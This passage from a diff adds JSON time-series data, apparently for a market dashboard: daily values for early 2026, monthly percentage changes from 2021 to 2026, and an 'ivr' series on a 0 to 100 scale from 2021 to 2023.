+ 18865.711303516644 + ], + [ + "2026-01-14", + 18664.172445874552 + ], + [ + "2026-01-15", + 18731.35329243864 + ], + [ + "2026-01-16", + 18715.68800994669 + ], + [ + "2026-01-20", + 18318.032113552956 + ], + [ + "2026-01-21", + 18565.66287535165 + ], + [ + "2026-01-22", + 18700.624742659213 + ], + [ + "2026-01-23", + 18759.670099349998 + ], + [ + "2026-01-26", + 18842.21430029126 + ], + [ + "2026-01-27", + 19013.02460815392 + ], + [ + "2026-01-28", + 19075.98582521142 + ], + [ + "2026-01-29", + 18961.810972196563 + ], + [ + "2026-01-30", + 18734.06328137132 + ], + [ + "2026-02-02", + 18862.699386469183 + ], + [ + "2026-02-03", + 18572.892580880605 + ], + [ + "2026-02-04", + 18248.44320617097 + ], + [ + "2026-02-05", + 17985.751018109888 + ], + [ + "2026-02-06", + 18365.93190434807 + ], + [ + "2026-02-09", + 18506.61751866086 + ], + [ + "2026-02-10", + 18420.759472557358 + ], + [ + "2026-02-11", + 18470.165221876203 + ], + [ + "2026-02-12", + 18094.50221120921 + ], + [ + "2026-02-13", + 18133.062481722074 + ], + [ + "2026-02-17", + 18114.38344115757 + ], + [ + "2026-02-18", + 18249.647236579916 + ], + [ + "2026-02-19", + 18179.75640108315 + ], + [ + "2026-02-20", + 18340.627014484173 + ], + [ + "2026-02-23", + 18117.697286319813 + ], + [ + "2026-02-24", + 18312.308366547728 + ], + [ + "2026-02-25", + 18577.712384566577 + ], + [ + "2026-02-26", + 18353.580467018357 + ], + [ + "2026-02-27", + 18294.835197417262 + ], + [ + "2026-03-02", + 18318.93605687221 + ], + [ + "2026-03-03", + 18122.820859145657 + ], + [ + "2026-03-04", + 18399.070355970485 + ], + [ + "2026-03-05", + 18343.63709050654 + ], + [ + "2026-03-06", + 18067.689521796496 + ], + [ + "2026-03-09", + 18308.994521385484 + ], + [ + "2026-03-10", + 18309.296449500267 + ], + [ + "2026-03-11", + 18306.886547657283 + ], + [ + "2026-03-12", + 17992.67879552406 + ], + [ + "2026-03-13", + 17886.033735127854 + ], + [ + "2026-03-16", + 18086.66864945069 + ], + [ + "2026-03-17", + 18174.936597397176 + ], + [ + "2026-03-18", + 17921.583929618348 + ], + [ + "2026-03-19", + 17864.946633745458 + ], + [ + "2026-03-20", + 17534.771671005503 + ], + [ + "2026-03-23", + 17736.052785134973 + ], + [ + "2026-03-24", + 17614.79550859837 + ], + [ + "2026-03-25", + 17730.62360214417 + ], + [ + "2026-03-26", + 17307.43084672518 + ], + [ + "2026-03-27", + 16969.300814570757 + ], + [ + "2026-03-30", + 16839.598755945706 + ], + [ + "2026-03-31", + 17409.68506228142 + ], + [ + "2026-04-01", + 17624.749931260725 + ], + [ + "2026-04-02", + 17644.95886367513 + ], + [ + "2026-04-06", + 17751.134462673355 + ], + [ + "2026-04-07", + 17753.849974681303 + ], + [ + "2026-04-08", + 18281.708688524606 + ], + [ + "2026-04-09", + 18405.377707929285 + ], + [ + "2026-04-10", + 18431.921607678843 + ], + [ + "2026-04-13", + 18622.554232686976 + ], + [ + "2026-04-14", + 18960.684264841402 + ], + [ + "2026-04-15", + 19226.12326233696 + ], + [ + "2026-04-16", + 19318.723142320538 + ], + [ + "2026-04-17", + 19571.492205145794 + ], + [ + "2026-04-20", + 19509.35576732867 + ], + [ + "2026-04-21", + 19435.155092095898 + ], + [ + "2026-04-22", + 19760.315102490327 + ], + [ + "2026-04-23", + 19649.01224861608 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + 0.05178414923843189 + ], + [ + "2021-06-30", + 0.6950697967834651 + ], + [ + "2021-07-31", + 0.24662697723027982 + ], + [ + "2021-08-31", + 0.2583862788740676 + ], + [ + "2021-09-30", + -1.0568536675554907 + ], + [ + "2021-10-31", + 0.9964682322413099 + ], + [ + "2021-11-30", + -0.08096115603450915 + ], + [ + "2021-12-31", + 2.618691545971674 + ], + [ + "2022-01-31", + -6.397624507010802 + ], + [ + "2022-02-28", + 1.9746404022250807 + ], + [ + "2022-03-31", + -0.04944618420156255 + ], + [ + "2022-04-30", + -5.499660881459489 + ], + [ + "2022-05-31", + 0.4950972346617677 + ], + [ + "2022-06-30", + -0.2259650889412601 + ], + [ + "2022-07-31", + 1.998829285310899 + ], + [ + "2022-08-31", + -1.4994572172713938 + ], + [ + "2022-09-30", + -2.3071757601692555 + ], + [ + "2022-10-31", + 1.383680910247409 + ], + [ + "2022-11-30", + 0.7469857676841052 + ], + [ + "2022-12-31", + -0.7374573296160203 + ], + [ + "2023-01-31", + 0.7621359330955091 + ], + [ + "2023-02-28", + -0.1735370334827402 + ], + [ + "2023-03-31", + 0.7346258725665855 + ], + [ + "2023-04-30", + 0.22311251152478118 + ], + [ + "2023-05-31", + 0.2583862788740898 + ], + [ + "2023-06-30", + 0.24662697723027982 + ], + [ + "2023-07-31", + 0.2348690548344523 + ], + [ + "2023-08-31", + 0.2701469599276418 + ], + [ + "2023-09-30", + 0.2348690548344301 + ], + [ + "2023-10-31", + 0.32278285333982026 + ], + [ + "2023-11-30", + 0.6990580885052999 + ], + [ + "2023-12-31", + 0.2348690548344301 + ], + [ + "2024-01-31", + 0.44280390183375484 + ], + [ + "2024-02-29", + 0.8495482994514303 + ], + [ + "2024-03-31", + 1.1951431626218367 + ], + [ + "2024-04-30", + -1.541174358527575 + ], + [ + "2024-05-31", + 1.2321553285785214 + ], + [ + "2024-06-30", + 0.36409822941523284 + ], + [ + "2024-07-31", + 1.0617790314344955 + ], + [ + "2024-08-31", + 4.130850504562633 + ], + [ + "2024-09-30", + 1.9562795552096501 + ], + [ + "2024-10-31", + 1.1044704644652015 + ], + [ + "2024-11-30", + 1.136284728525938 + ], + [ + "2024-12-31", + -0.33167387353882916 + ], + [ + "2025-01-31", + 3.1295386662269387 + ], + [ + "2025-02-28", + 0.06902821331939979 + ], + [ + "2025-03-31", + -4.134476425998745 + ], + [ + "2025-04-30", + -0.9614805672441995 + ], + [ + "2025-05-31", + 3.7567215339755267 + ], + [ + "2025-06-30", + 0.4901793063961213 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.24662697723025762 + ], + [ + "2025-09-30", + 0.24662697723025762 + ], + [ + "2025-10-31", + 1.321793297880025 + ], + [ + "2025-11-30", + 1.5060350305366788 + ], + [ + "2025-12-31", + 1.8587021443433827 + ], + [ + "2026-01-31", + 0.2348690548344301 + ], + [ + "2026-02-28", + 1.1923047576955836 + ], + [ + "2026-03-31", + 1.5193520346924672 + ], + [ + "2026-04-30", + 1.3575668981352873 + ] + ], + "ivr": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 50.0 + ], + [ + "2021-05-04", + 50.0 + ], + [ + "2021-05-05", + 50.0 + ], + [ + "2021-05-06", + 50.0 + ], + [ + "2021-05-07", + 50.0 + ], + [ + "2021-05-10", + 50.0 + ], + [ + "2021-05-11", + 50.0 + ], + [ + "2021-05-12", + 50.0 + ], + [ + "2021-05-13", + 50.0 + ], + [ + "2021-05-14", + 50.0 + ], + [ + "2021-05-17", + 50.0 + ], + [ + "2021-05-18", + 50.0 + ], + [ + "2021-05-19", + 50.0 + ], + [ + "2021-05-20", + 50.0 + ], + [ + "2021-05-21", + 50.0 + ], + [ + "2021-05-24", + 50.0 + ], + [ + "2021-05-25", + 0.0 + ], + [ + "2021-05-26", + 100.0 + ], + [ + "2021-05-27", + 23.74186564350142 + ], + [ + "2021-05-28", + 0.0 + ], + [ + "2021-06-01", + 0.0 + ], + [ + "2021-06-02", + 0.0 + ], + [ + "2021-06-03", + 29.355016916207 + ], + [ + "2021-06-04", + 95.68207287737918 + ], + [ + "2021-06-07", + 80.85523934435014 + ], + [ + "2021-06-08", + 0.0 + ], + [ + "2021-06-09", + 0.0 + ], + [ + "2021-06-10", + 0.0 + ], + [ + "2021-06-11", + 0.0 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.6659539255877059 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 5.677903394297917 + ], + [ + "2021-06-18", + 0.0 + ], + [ + "2021-06-21", + 0.0 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.15693442459293008 + ], + [ + "2021-06-24", + 1.0451469298068008 + ], + [ + "2021-06-25", + 0.0 + ], + [ + "2021-06-28", + 5.278559019555378 + ], + [ + "2021-06-29", + 2.7401753545839345 + ], + [ + "2021-06-30", + 3.992177023659308 + ], + [ + "2021-07-01", + 0.0 + ], + [ + "2021-07-02", + 0.0 + ], + [ + "2021-07-06", + 0.06094887315626779 + ], + [ + "2021-07-07", + 0.0 + ], + [ + "2021-07-08", + 4.73985878524639 + ], + [ + "2021-07-09", + 1.9801887647753753 + ], + [ + "2021-07-12", + 2.0550584484713132 + ], + [ + "2021-07-13", + 0.0 + ], + [ + "2021-07-14", + 0.0 + ], + [ + "2021-07-15", + 3.4859073164735808 + ], + [ + "2021-07-16", + 3.9523569245265273 + ], + [ + "2021-07-19", + 3.994487270890907 + ], + [ + "2021-07-20", + 7.958665707832953 + ], + [ + "2021-07-21", + 6.6357847678243 + ], + [ + "2021-07-22", + 7.933933547996574 + ], + [ + "2021-07-23", + 11.522296222723135 + ], + [ + "2021-07-26", + 10.84573551030592 + ], + [ + "2021-07-27", + 15.000881552883197 + ], + [ + "2021-07-28", + 14.974275810093008 + ], + [ + "2021-07-29", + 14.4610543343722 + ], + [ + "2021-07-30", + 16.698627434679615 + ], + [ + "2021-08-02", + 10.95541764081763 + ], + [ + "2021-08-03", + 11.610293963969367 + ], + [ + "2021-08-04", + 11.55543074646532 + ], + [ + "2021-08-05", + 10.262886942047155 + ], + [ + "2021-08-06", + 10.925849145238189 + ], + [ + "2021-08-09", + 10.351036646100507 + ], + [ + "2021-08-10", + 12.183992013941623 + ], + [ + "2021-08-11", + 12.3973750278029 + ], + [ + "2021-08-12", + 9.514121815288236 + ], + [ + "2021-08-13", + 4.413318098603314 + ], + [ + "2021-08-16", + 0.0 + ], + [ + "2021-08-17", + 0.8997206371895378 + ], + [ + "2021-08-18", + 4.3823645048399404 + ], + [ + "2021-08-19", + 2.724250454790551 + ], + [ + "2021-08-20", + 1.6622806467140958 + ], + [ + "2021-08-23", + 14.265664239759571 + ], + [ + "2021-08-24", + 6.378893219595012 + ], + [ + "2021-08-25", + 6.0774845742723524 + ], + [ + "2021-08-26", + 8.703639801554552 + ], + [ + "2021-08-27", + 10.770159402375173 + ], + [ + "2021-08-30", + 15.363954316506097 + ], + [ + "2021-08-31", + 14.991657448170065 + ], + [ + "2021-09-01", + 14.991127489943636 + ], + [ + "2021-09-02", + 14.023676367948385 + ], + [ + "2021-09-03", + 12.12696062317956 + ], + [ + "2021-09-07", + 12.13742083345367 + ], + [ + "2021-09-08", + 11.05834975648138 + ], + [ + "2021-09-09", + 11.9698690881612 + ], + [ + "2021-09-10", + 16.266246735777273 + ], + [ + "2021-09-13", + 16.190384803950042 + ], + [ + "2021-09-14", + 16.968565878909335 + ], + [ + "2021-09-15", + 13.52413990622635 + ], + [ + "2021-09-16", + 5.7175661983318 + ], + [ + "2021-09-17", + 15.805926651803635 + ], + [ + "2021-09-20", + 33.30731905089625 + ], + [ + "2021-09-21", + 21.82072111312466 + ], + [ + "2021-09-22", + 26.541840897363024 + ], + [ + "2021-09-23", + 30.968128254215515 + ], + [ + "2021-09-24", + 29.488842394756144 + ], + [ + "2021-09-27", + 27.580011112120882 + ], + [ + "2021-09-28", + 50.37263541671733 + ], + [ + "2021-09-29", + 50.25952996599942 + ], + [ + "2021-09-30", + 49.413499445427504 + ], + [ + "2021-10-01", + 52.34251492691253 + ], + [ + "2021-10-04", + 62.12018522987377 + ], + [ + "2021-10-05", + 70.76921507439332 + ], + [ + "2021-10-06", + 73.89929560448938 + ], + [ + "2021-10-07", + 78.2280188418254 + ], + [ + "2021-10-08", + 77.56829947800088 + ], + [ + "2021-10-11", + 78.39222520987123 + ], + [ + "2021-10-12", + 78.41863694715504 + ], + [ + "2021-10-13", + 78.69356537306248 + ], + [ + "2021-10-14", + 91.42965361985979 + ], + [ + "2021-10-15", + 89.4926944742115 + ], + [ + "2021-10-18", + 79.02614800687388 + ], + [ + "2021-10-19", + 80.25638062209876 + ], + [ + "2021-10-20", + 77.91794800889852 + ], + [ + "2021-10-21", + 76.41435662588584 + ], + [ + "2021-10-22", + 78.94610964954316 + ], + [ + "2021-10-25", + 79.42513776744528 + ], + [ + "2021-10-26", + 47.82734146787103 + ], + [ + "2021-10-27", + 46.84635963589812 + ], + [ + "2021-10-28", + 47.343306717420994 + ], + [ + "2021-10-29", + 47.15736824322532 + ], + [ + "2021-11-01", + 19.332385410340237 + ], + [ + "2021-11-02", + 15.578198637048363 + ], + [ + "2021-11-03", + 17.412908649170625 + ], + [ + "2021-11-04", + 19.65724327225532 + ], + [ + "2021-11-05", + 15.045256884854522 + ], + [ + "2021-11-08", + 8.497718764831628 + ], + [ + "2021-11-09", + 12.64564046394625 + ], + [ + "2021-11-10", + 30.90091846691754 + ], + [ + "2021-11-11", + 20.02411401081786 + ], + [ + "2021-11-12", + 22.34595766806748 + ], + [ + "2021-11-15", + 20.460337461762528 + ], + [ + "2021-11-16", + 20.271131790704626 + ], + [ + "2021-11-17", + 19.782423469535257 + ], + [ + "2021-11-18", + 21.993348335678185 + ], + [ + "2021-11-19", + 14.63790996793387 + ], + [ + "2021-11-22", + 23.941474968911805 + ], + [ + "2021-11-23", + 26.452153348554187 + ], + [ + "2021-11-24", + 26.47222387662833 + ], + [ + "2021-11-26", + 41.017103100216254 + ], + [ + "2021-11-29", + 55.692027994067914 + ], + [ + "2021-11-30", + 64.58681386478925 + ], + [ + "2021-12-01", + 74.52507870042048 + ], + [ + "2021-12-02", + 71.9746978139938 + ], + [ + "2021-12-03", + 73.93933090952244 + ], + [ + "2021-12-06", + 76.67428829583218 + ], + [ + "2021-12-07", + 100.0 + ], + [ + "2021-12-08", + 99.1419030766204 + ], + [ + "2021-12-09", + 98.96952789578583 + ], + [ + "2021-12-10", + 100.0 + ], + [ + "2021-12-13", + 100.0 + ], + [ + "2021-12-14", + 100.0 + ], + [ + "2021-12-15", + 100.0 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.79065157450792 + ], + [ + "2021-12-20", + 97.6343491520773 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 100.0 + ], + [ + "2021-12-27", + 97.97795184093727 + ], + [ + "2021-12-28", + 92.47973561201536 + ], + [ + "2021-12-29", + 88.9618803670638 + ], + [ + "2021-12-30", + 83.75733443433766 + ], + [ + "2021-12-31", + 84.34357766743594 + ], + [ + "2022-01-03", + 79.61643703126998 + ], + [ + "2022-01-04", + 82.77088850665889 + ], + [ + "2022-01-05", + 83.22750059859068 + ], + [ + "2022-01-06", + 82.56805254623698 + ], + [ + "2022-01-07", + 81.30496804754962 + ], + [ + "2022-01-10", + 78.94222548981126 + ], + [ + "2022-01-11", + 80.50315770706793 + ], + [ + "2022-01-12", + 79.2487899966418 + ], + [ + "2022-01-13", + 79.08429066953026 + ], + [ + "2022-01-14", + 69.8031236875845 + ], + [ + "2022-01-18", + 78.6890754762081 + ], + [ + "2022-01-19", + 79.18731687880548 + ], + [ + "2022-01-20", + 70.00652590050808 + ], + [ + "2022-01-21", + 75.01167551652836 + ], + [ + "2022-01-24", + 73.69614832558453 + ], + [ + "2022-01-25", + 70.15000643235958 + ], + [ + "2022-01-26", + 70.80000504134833 + ], + [ + "2022-01-27", + 69.90704172175057 + ], + [ + "2022-01-28", + 94.05762723162738 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 99.04216841347497 + ], + [ + "2022-02-02", + 99.800599373191 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 100.0 + ], + [ + "2022-02-07", + 99.60113601063742 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 99.4961764566056 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 99.19494184211065 + ], + [ + "2022-02-17", + 100.0 + ], + [ + "2022-02-18", + 95.32389077728304 + ], + [ + "2022-02-22", + 95.57594667862668 + ], + [ + "2022-02-23", + 95.9090977374901 + ], + [ + "2022-02-24", + 100.0 + ], + [ + "2022-02-25", + 100.0 + ], + [ + "2022-02-28", + 93.27377979370236 + ], + [ + "2022-03-01", + 85.97648659258135 + ], + [ + "2022-03-02", + 88.00646557602708 + ], + [ + "2022-03-03", + 88.01672380688017 + ], + [ + "2022-03-04", + 78.04384357646484 + ], + [ + "2022-03-07", + 85.39909714348997 + ], + [ + "2022-03-08", + 85.33149088935816 + ], + [ + "2022-03-09", + 95.31522099072794 + ], + [ + "2022-03-10", + 91.15322228877596 + ], + [ + "2022-03-11", + 90.7989726283219 + ], + [ + "2022-03-14", + 87.04029544669685 + ], + [ + "2022-03-15", + 95.63088641805807 + ], + [ + "2022-03-16", + 100.0 + ], + [ + "2022-03-17", + 100.0 + ], + [ + "2022-03-18", + 97.2004069117665 + ], + [ + "2022-03-21", + 96.22685521113883 + ], + [ + "2022-03-22", + 97.23423595861948 + ], + [ + "2022-03-23", + 93.63979622803421 + ], + [ + "2022-03-24", + 89.93868251599886 + ], + [ + "2022-03-25", + 88.75257544555552 + ], + [ + "2022-03-28", + 89.90207560796566 + ], + [ + "2022-03-29", + 88.64275643135164 + ], + [ + "2022-03-30", + 88.92956883379782 + ], + [ + "2022-03-31", + 88.89610939817928 + ], + [ + "2022-04-01", + 86.80134293223519 + ], + [ + "2022-04-04", + 74.83696523708093 + ], + [ + "2022-04-05", + 80.23951031725721 + ], + [ + "2022-04-06", + 77.92129742137946 + ], + [ + "2022-04-07", + 76.38705655519144 + ], + [ + "2022-04-08", + 74.00334940497207 + ], + [ + "2022-04-11", + 75.71155283970164 + ], + [ + "2022-04-12", + 69.57587240397474 + ], + [ + "2022-04-13", + 61.082547718284054 + ], + [ + "2022-04-14", + 64.67214385303073 + ], + [ + "2022-04-18", + 60.31624935194524 + ], + [ + "2022-04-19", + 64.94154103460491 + ], + [ + "2022-04-20", + 62.63686139781098 + ], + [ + "2022-04-21", + 64.08701534154227 + ], + [ + "2022-04-22", + 63.01518772317345 + ], + [ + "2022-04-25", + 65.45249577802622 + ], + [ + "2022-04-26", + 70.60203782965658 + ], + [ + "2022-04-27", + 65.73046075427824 + ], + [ + "2022-04-28", + 80.16515909257605 + ], + [ + "2022-04-29", + 90.21557094197067 + ], + [ + "2022-05-02", + 93.51451464687503 + ], + [ + "2022-05-03", + 88.5653681231194 + ], + [ + "2022-05-04", + 97.21856748744914 + ], + [ + "2022-05-05", + 100.0 + ], + [ + "2022-05-06", + 99.77598466880583 + ], + [ + "2022-05-09", + 100.0 + ], + [ + "2022-05-10", + 100.0 + ], + [ + "2022-05-11", + 100.0 + ], + [ + "2022-05-12", + 96.24075510556442 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.89002103651472 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 99.39482350055383 + ], + [ + "2022-05-20", + 97.80863763814264 + ], + [ + "2022-05-23", + 98.47074327434109 + ], + [ + "2022-05-24", + 95.19955335944448 + ], + [ + "2022-05-25", + 96.45541616133042 + ], + [ + "2022-05-26", + 94.2893348011486 + ], + [ + "2022-05-27", + 92.23893027221561 + ], + [ + "2022-05-31", + 91.06837171150273 + ], + [ + "2022-06-01", + 91.20641184679906 + ], + [ + "2022-06-02", + 89.55502749439415 + ], + [ + "2022-06-03", + 81.91125038699565 + ], + [ + "2022-06-06", + 81.44387714758639 + ], + [ + "2022-06-07", + 73.7603752157447 + ], + [ + "2022-06-08", + 73.6532999649982 + ], + [ + "2022-06-09", + 72.894913948801 + ], + [ + "2022-06-10", + 79.28590950439668 + ], + [ + "2022-06-13", + 81.37919810126071 + ], + [ + "2022-06-14", + 81.37327309837868 + ], + [ + "2022-06-15", + 81.0659769505951 + ], + [ + "2022-06-16", + 77.95415870713487 + ], + [ + "2022-06-17", + 79.00210979214914 + ], + [ + "2022-06-21", + 82.39455536730857 + ], + [ + "2022-06-22", + 80.89562881046808 + ], + [ + "2022-06-23", + 80.15654756171764 + ], + [ + "2022-06-24", + 84.88015663179117 + ], + [ + "2022-06-27", + 81.60092320397455 + ], + [ + "2022-06-28", + 79.47479012272231 + ], + [ + "2022-06-29", + 79.56479227146211 + ], + [ + "2022-06-30", + 79.7873552913828 + ], + [ + "2022-07-01", + 75.41044382289893 + ], + [ + "2022-07-05", + 75.18776504270195 + ], + [ + "2022-07-06", + 75.36783546533424 + ], + [ + "2022-07-07", + 77.45538338027505 + ], + [ + "2022-07-08", + 77.40646767416979 + ], + [ + "2022-07-11", + 76.10796890058252 + ], + [ + "2022-07-12", + 70.39946228028867 + ], + [ + "2022-07-13", + 58.08470511245477 + ], + [ + "2022-07-14", + 58.09680243250642 + ], + [ + "2022-07-15", + 56.63010117236582 + ], + [ + "2022-07-18", + 44.99983985161698 + ], + [ + "2022-07-19", + 48.96345264679755 + ], + [ + "2022-07-20", + 47.01535310488542 + ], + [ + "2022-07-21", + 47.50251834880193 + ], + [ + "2022-07-22", + 49.806609905842095 + ], + [ + "2022-07-25", + 42.54568906299872 + ], + [ + "2022-07-26", + 45.17298265291075 + ], + [ + "2022-07-27", + 48.61083316847489 + ], + [ + "2022-07-28", + 48.72098032385958 + ], + [ + "2022-07-29", + 47.944407743296274 + ], + [ + "2022-08-01", + 48.21261800496258 + ], + [ + "2022-08-02", + 47.6714986948818 + ], + [ + "2022-08-03", + 50.78791697427669 + ], + [ + "2022-08-04", + 49.20249547596388 + ], + [ + "2022-08-05", + 50.189992976704936 + ], + [ + "2022-08-08", + 46.00024299291782 + ], + [ + "2022-08-09", + 46.38796120405036 + ], + [ + "2022-08-10", + 49.11748206124836 + ], + [ + "2022-08-11", + 49.93630120844097 + ], + [ + "2022-08-12", + 50.13858292220902 + ], + [ + "2022-08-15", + 48.7618655953656 + ], + [ + "2022-08-16", + 45.47116555048516 + ], + [ + "2022-08-17", + 46.21900071540295 + ], + [ + "2022-08-18", + 45.47409757049334 + ], + [ + "2022-08-19", + 46.12273643817509 + ], + [ + "2022-08-22", + 50.814232355472576 + ], + [ + "2022-08-23", + 47.34197224195337 + ], + [ + "2022-08-24", + 35.69546147386276 + ], + [ + "2022-08-25", + 37.2594405607764 + ], + [ + "2022-08-26", + 47.2404152812069 + ], + [ + "2022-08-29", + 47.76777503054962 + ], + [ + "2022-08-30", + 48.343713888091706 + ], + [ + "2022-08-31", + 42.150394434960724 + ], + [ + "2022-09-01", + 41.72502409635791 + ], + [ + "2022-09-02", + 42.32998098997329 + ], + [ + "2022-09-06", + 42.40091561995008 + ], + [ + "2022-09-07", + 45.94003442700361 + ], + [ + "2022-09-08", + 39.47302219148618 + ], + [ + "2022-09-09", + 43.97292522492937 + ], + [ + "2022-09-12", + 42.17111603960178 + ], + [ + "2022-09-13", + 58.000494816025416 + ], + [ + "2022-09-14", + 59.001529166079166 + ], + [ + "2022-09-15", + 59.52116091506983 + ], + [ + "2022-09-16", + 58.73387937318202 + ], + [ + "2022-09-19", + 58.719099299695465 + ], + [ + "2022-09-20", + 55.912981925405404 + ], + [ + "2022-09-21", + 57.013308119856454 + ], + [ + "2022-09-22", + 56.927157084749034 + ], + [ + "2022-09-23", + 53.83156803330454 + ], + [ + "2022-09-26", + 46.047800571401154 + ], + [ + "2022-09-27", + 46.1025207648293 + ], + [ + "2022-09-28", + 49.690365691414065 + ], + [ + "2022-09-29", + 53.474881480926186 + ], + [ + "2022-09-30", + 54.27094961004825 + ], + [ + "2022-10-03", + 58.50960349512169 + ], + [ + "2022-10-04", + 64.99539614573348 + ], + [ + "2022-10-05", + 62.27424569008316 + ], + [ + "2022-10-06", + 62.018344089018655 + ], + [ + "2022-10-07", + 64.41544665926276 + ], + [ + "2022-10-10", + 62.38829131791122 + ], + [ + "2022-10-11", + 47.92149886866858 + ], + [ + "2022-10-12", + 46.891056957488054 + ], + [ + "2022-10-13", + 50.95050247215019 + ], + [ + "2022-10-14", + 55.14872501460839 + ], + [ + "2022-10-17", + 62.59315924932655 + ], + [ + "2022-10-18", + 63.26566072421278 + ], + [ + "2022-10-19", + 61.86160377519322 + ], + [ + "2022-10-20", + 61.32460411896486 + ], + [ + "2022-10-21", + 63.52789078351043 + ], + [ + "2022-10-24", + 64.07101940327115 + ], + [ + "2022-10-25", + 66.04693125242359 + ], + [ + "2022-10-26", + 66.9772156781668 + ], + [ + "2022-10-27", + 64.44012136429043 + ], + [ + "2022-10-28", + 67.06655020100104 + ], + [ + "2022-10-31", + 65.49674651915441 + ], + [ + "2022-11-01", + 60.503358593782096 + ], + [ + "2022-11-02", + 66.49192535413479 + ], + [ + "2022-11-03", + 67.75625367033096 + ], + [ + "2022-11-04", + 62.27033067324243 + ], + [ + "2022-11-07", + 62.35616307514267 + ], + [ + "2022-11-08", + 60.93770346506254 + ], + [ + "2022-11-09", + 64.04052698589805 + ], + [ + "2022-11-10", + 87.94322720522982 + ], + [ + "2022-11-11", + 83.6143598515641 + ], + [ + "2022-11-14", + 80.42828492884276 + ], + [ + "2022-11-15", + 80.81628401469455 + ], + [ + "2022-11-16", + 81.90566266523864 + ], + [ + "2022-11-17", + 81.69803611268362 + ], + [ + "2022-11-18", + 79.53019300452374 + ], + [ + "2022-11-21", + 79.02456284585071 + ], + [ + "2022-11-22", + 77.81720903946695 + ], + [ + "2022-11-23", + 75.38637834046015 + ], + [ + "2022-11-25", + 72.18419762911765 + ], + [ + "2022-11-28", + 67.23682178993123 + ], + [ + "2022-11-29", + 65.64175970589999 + ], + [ + "2022-11-30", + 75.27845022106693 + ], + [ + "2022-12-01", + 65.9216529285795 + ], + [ + "2022-12-02", + 62.17711599721943 + ], + [ + "2022-12-05", + 64.23719137415584 + ], + [ + "2022-12-06", + 63.79419389974651 + ], + [ + "2022-12-07", + 63.922069476148735 + ], + [ + "2022-12-08", + 59.38444151559394 + ], + [ + "2022-12-09", + 14.161314764657943 + ], + [ + "2022-12-12", + 11.738007004016387 + ], + [ + "2022-12-13", + 12.086965574783793 + ], + [ + "2022-12-14", + 10.729799630038935 + ], + [ + "2022-12-15", + 20.206553765098818 + ], + [ + "2022-12-16", + 20.885461173583106 + ], + [ + "2022-12-19", + 22.227599056905554 + ], + [ + "2022-12-20", + 21.62537546827086 + ], + [ + "2022-12-21", + 21.783669457432815 + ], + [ + "2022-12-22", + 24.44749646019263 + ], + [ + "2022-12-23", + 24.547690928464718 + ], + [ + "2022-12-27", + 24.44531415092036 + ], + [ + "2022-12-28", + 25.232331091336015 + ], + [ + "2022-12-29", + 7.589848079165362 + ], + [ + "2022-12-30", + 7.3413648693806515 + ], + [ + "2023-01-03", + 7.411003165325781 + ], + [ + "2023-01-04", + 6.684281959044415 + ], + [ + "2023-01-05", + 4.7617096300940425 + ], + [ + "2023-01-06", + 14.472608907550336 + ], + [ + "2023-01-09", + 13.22043342905395 + ], + [ + "2023-01-10", + 14.314739328151802 + ], + [ + "2023-01-11", + 15.864160155407347 + ], + [ + "2023-01-12", + 14.779501726828823 + ], + [ + "2023-01-13", + 14.978564997022298 + ], + [ + "2023-01-17", + 2.2710900578387045 + ], + [ + "2023-01-18", + 2.950736827367417 + ], + [ + "2023-01-19", + 1.8589421356713307 + ], + [ + "2023-01-20", + 9.700542186517039 + ], + [ + "2023-01-23", + 12.367541933047486 + ], + [ + "2023-01-24", + 4.169564585952797 + ], + [ + "2023-01-25", + 4.541591635730291 + ], + [ + "2023-01-26", + 2.9771702220579717 + ], + [ + "2023-01-27", + 0.0 + ], + [ + "2023-01-30", + 3.925474495527432 + ], + [ + "2023-01-31", + 4.965381242046001 + ], + [ + "2023-02-01", + 5.8858893620411905 + ], + [ + "2023-02-02", + 14.413370106317085 + ], + [ + "2023-02-03", + 15.210422862024798 + ], + [ + "2023-02-06", + 13.812783441063978 + ], + [ + "2023-02-07", + 16.0211748950675 + ], + [ + "2023-02-08", + 22.012210381055063 + ], + [ + "2023-02-09", + 22.518679823478013 + ], + [ + "2023-02-10", + 23.662079854841316 + ], + [ + "2023-02-13", + 25.027609904737265 + ], + [ + "2023-02-14", + 25.066548641385474 + ], + [ + "2023-02-15", + 22.177532072083807 + ], + [ + "2023-02-16", + 25.60192031181555 + ], + [ + "2023-02-17", + 21.421091004190636 + ], + [ + "2023-02-21", + 23.960693655306514 + ], + [ + "2023-02-22", + 23.879380419306784 + ], + [ + "2023-02-23", + 24.24550871748206 + ], + [ + "2023-02-24", + 23.81573451351196 + ], + [ + "2023-02-27", + 23.40209619186675 + ], + [ + "2023-02-28", + 19.297341151656497 + ], + [ + "2023-03-01", + 17.618888747416996 + ], + [ + "2023-03-02", + 12.971459211093538 + ], + [ + "2023-03-03", + 3.3233837987761916 + ], + [ + "2023-03-06", + 0.32743003219848665 + ], + [ + "2023-03-07", + 1.2703970077795828 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 1.1548960194196176 + ], + [ + "2023-03-13", + 1.923258868373848 + ], + [ + "2023-03-14", + 5.46324893597162 + ], + [ + "2023-03-15", + 5.033425899106714 + ], + [ + "2023-03-16", + 12.941256676372253 + ], + [ + "2023-03-17", + 9.10116448326863 + ], + [ + 